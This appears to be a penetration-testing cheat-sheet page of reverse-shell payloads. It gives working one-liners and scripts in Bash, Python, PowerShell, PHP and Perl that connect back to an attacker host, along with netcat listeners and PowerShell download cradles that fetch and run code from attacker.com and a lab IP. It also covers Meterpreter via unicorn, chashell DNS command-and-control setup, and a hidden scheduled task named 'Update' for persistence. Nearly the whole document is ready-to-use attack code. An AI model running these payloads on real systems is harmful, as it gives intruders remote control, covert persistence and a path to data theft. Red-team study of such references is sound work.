Reverse Shells

Bash

/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f

Python

IPv4

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

IPv6

import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

PowerShell

$client = New-Object System.Net.Sockets.TCPClient("10.10.13.37",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$socket = new-object System.Net.Sockets.TcpClient("10.10.13.37",1337);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;
    $res = ""
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 1024)
    }
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $args = "";
        if($out.IndexOf(' ') -gt -1){
            $args = $out.substring($out.IndexOf(' ')+1);
            $out = $out.substring(0,$out.IndexOf(' '));
            if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
            }
            else{
                $res = (&"$out" "$args") | out-string;
            }
        }
        else{
            $res = (&"$out") | out-string;
        }
        if($res -ne $null){
        $writer.WriteLine($res)
    }
    }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()

#$a=New-Object System.Net.Sockets.TcpClient("10.10.13.37",1337);if($a -eq $null){exit 1}$b=$a.GetStream();$c=New-Object System.IO.StreamWriter($b);$d=New-Object System.Byte[] 1024;$e=New-Object System.Text.AsciiEncoding;do{$c.Flush();$f=$null;$g="";while($b.DataAvailable -or $f -eq $null) {$f=$b.Read($d,0,1024)}$h=$e.GetString($d,0,$f).Replace("`r`n","").Replace("`n","");if(!$h.equals("exit")){$i="";if($h.IndexOf(" ") -gt -1){$i=$h.Substring($h.IndexOf(" ")+1);$h=$h.Substring(0,$h.IndexOf(" "));if($i.Split(" ").Length -gt 1){$k=New-Object System.Diagnostics.ProcessStartInfo;$k.FileName="cmd.exe";$k.RedirectStandardError=$true;$k.RedirectStandardOutput=$true;$k.UseShellExecute=$false;$k.Arguments="/c $h $i";$p=New-Object System.Diagnostics.Process;$p.StartInfo=$k;$p.Start()|Out-Null;$p.WaitForExit();$l=$p.StandardOutput.ReadToEnd();$m=$p.StandardError.ReadToEnd();if($p.ExitCode -ne 0){$g=$m}else{$g=$l}}else{$g=(&"$h" "$i")|Out-String;}}else{$g=(&"$h")|Out-String;}if($g -ne $null){$c.WriteLine($g)}}}while(!$h.equals("exit"))$c.close();$a.close();$b.Dispose()

Download Cradles

PowerShell DNS Delivery

'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'

wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'

PHP

<?php echo passthru("/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"); ?>

Perl

use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

C

C#

Netcat

https://blog.ikuamike.io/posts/2021/netcat/

$ {nc.tradentional|nc|ncat|netcat} <LHOST> <LPORT> {-e|-c} /bin/bash

Meterpreter

unicorn

https://github.com/trustedsec/unicorn

$ python3 unicorn.py windows/meterpreter/reverse_https 10.10.13.37 443
$ sudo msfconsole -qr unicorn.rc
PS > IEX(New-Object Net.WebClient).DownloadString('powershell_attack.txt')

Listeners

$ {nc.tradentional|nc|ncat|netcat} [-6] -lvnp <LPORT>

Transport over DNS

dnscat2

chashell

https://github.com/sysdream/chashell

Buy and configure DNS (e. g., c2cdomain.net):

A * -> <IP>
A @ -> <IP>
A chashell -> <IP>
NS c -> chashell.c2cdomain.net

Get dependencies:

$ export GOPATH=/home/snovvcrash/code/go
$ export PATH=$GOPATH:$GOPATH/bin:$PATH
$ go get -v -u github.com/golang/dep/cmd/dep
$ go get github.com/mitchellh/gox
$ cd $GOPATH/src/github.com/golang/dep
$ go install ./...

Clone chashell into $GOPATH/src (otherwise, dep will error out):

$ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell
$ cd $GOPATH/src/chashell

Build binaries:

$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.c2cdomain.net
$ make build-all OSARCH="linux/amd64"

Run server on Attacker:

$ cd release/
$ sudo systemctl stop systemd-resolved
$ sudo ./chaserv_linux_amd64

Run client on Victim:

$ ./chashell_linux_amd64

Tools

VbRev

https://github.com/VbScrub/VbRev

xc

https://github.com/xct/xc

Listen:

$ rlwrap ./xc -l -p 443

Launch:

PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443"

cliws

https://github.com/b23r0/cliws

Reverse mode:

$ rlwrap -cAr ./cliws -l 8000
Cmd > .\cliws.exe -r ws://10.10.13.37:8000 powershell

Create a scheduled task for persistence:

$ while true; do sudo netstat -tulpan | grep LISTEN | grep 8080 > /dev/null || rlwrap -cAr ./cliws -l 8080; done

$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 1)
$settings = New-ScheduledTaskSettingsSet -Hidden -MultipleInstances Queue
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden C:\Windows\Tasks\cliws.exe -r ws://10.10.13.37:8080 powershell"
Register-ScheduledTask -TaskName "Update" -Trigger $trigger -Settings $settings -Action $action

Last updated 1 year ago